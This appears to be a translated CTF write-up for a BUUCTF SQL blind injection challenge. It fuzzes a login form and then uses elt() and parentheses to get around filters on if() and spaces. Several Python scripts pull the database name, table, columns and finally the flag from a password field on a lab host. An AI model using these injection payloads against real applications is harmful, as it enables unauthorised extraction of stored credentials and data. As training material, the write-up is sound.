Welcome to my WeChat official account, the soul of the shell.
Environmental Science: BUUCTF online evaluation (buuoj.cn)
Similar to the previous target aircraft, it is also a login box, but there are several more buttons, and the marked bureau also reminds that it is through sql blind injection
data:image/s3,"s3://crabby-images/011d6/011d633eabd8ae810b0022847974eea79c623c18" alt=""
Do a simple fuzz y to the login box
You can see that the brackets are filtered, so the error injection is useless
data:image/s3,"s3://crabby-images/6ed89/6ed8909ac324c3112f605e814a86a9989eededa6" alt=""
However, there is more than one point that can be injected. Click the button on the home page to find a digital injection. You can try blind injection
Do some fuzz y
Only a few keywords are filtered, far less than the injection point just now, but the if function is filtered and can be replaced by elt
data:image/s3,"s3://crabby-images/1698c/1698c027951451e4743a720aa598b063f7d518bc" alt=""
data:image/s3,"s3://crabby-images/1a1ad/1a1adb3c1a0fe75f255349f08441dd3847416978" alt=""
First, judge whether it can be used
/search.php?id=elt(length(database())>1,6)
data:image/s3,"s3://crabby-images/07192/07192b9fbd0085840a3fb57a554fbd96de1eca07" alt=""
After determining that the elt function can be used for blind injection, the next step is to enter the blind injection stage
Because this injection point filters out spaces, I use () to bypass the filter. A big problem with using () to bypass the filter is that it will make the statements very messy, so I will test the statements locally and segment them. After confirming that the statements are available, I will run them on the target
Before writing a script, we should first obtain the judgment rules of blind note, and first determine the difference between correct statement and wrong statement
Correct execution
data:image/s3,"s3://crabby-images/18c0c/18c0cb5260f5f6e1e15e12596077be836e6acff0" alt=""
Error execution
data:image/s3,"s3://crabby-images/ca437/ca4372173d2c5802db762383e254534b6c2b8947" alt=""
syntax error
data:image/s3,"s3://crabby-images/19516/19516053b7e74b2b871c5c4819f472af2bb291e5" alt=""
First, get the length of the database
You can see that the length is 4
data:image/s3,"s3://crabby-images/63c94/63c94eb6e3ee78850dd81466364aec402f88aedc" alt=""
Then judge the name of the database and use the python script. Since buuctf's server adds a 200 status code, you can understand everything you know
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters and commas to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") # print(q) for i in range(1, 5): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" url = url + "elt(substr((select(database())),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(url) break # print(url)
See that the database name is geek
data:image/s3,"s3://crabby-images/5ca22/5ca222be87f0fa956c975491f99bbfc2bb1ae353" alt=""
Then judge the table name
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters and commas to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") # print(q) for i in range(1, 17): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6) url = url + "elt(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(url) break # print(url)
data:image/s3,"s3://crabby-images/b577f/b577f21e64aa47ec17c6f6ec87ed763637409488" alt=""
I have encountered a strange problem in exploding the field name. I don't know why. When exploding the table name, it can respond correctly regardless of case, but when exploding the field, it needs to be case sensitive. The field name I entered at the beginning is f1nal1y, but it can't be exploded. It needs to be replaced with F1naI1y
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters and commas to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") # print(q) for i in range(17, 21): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6) url = url + "elt(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(url) break # print(url)
data:image/s3,"s3://crabby-images/7e337/7e337c8159281a16d3c3f51904f37a600e347277" alt=""
flag is finally hidden in the password field, and this value is still very long, which takes a long time
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters, commas, -, {} to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") q.append("_") q.append("-") q.append("{") q.append("}") # print(q) for i in range(1, 230): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6) url = url + "elt(substr((select(group_concat(password))from(F1naI1y)),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(s, end="") break # print(url)
data:image/s3,"s3://crabby-images/2030b/2030b1a6b51ba192310931a86c1b6aed3c39d19c" alt=""
(as a result, he ran again because of the target mechanism)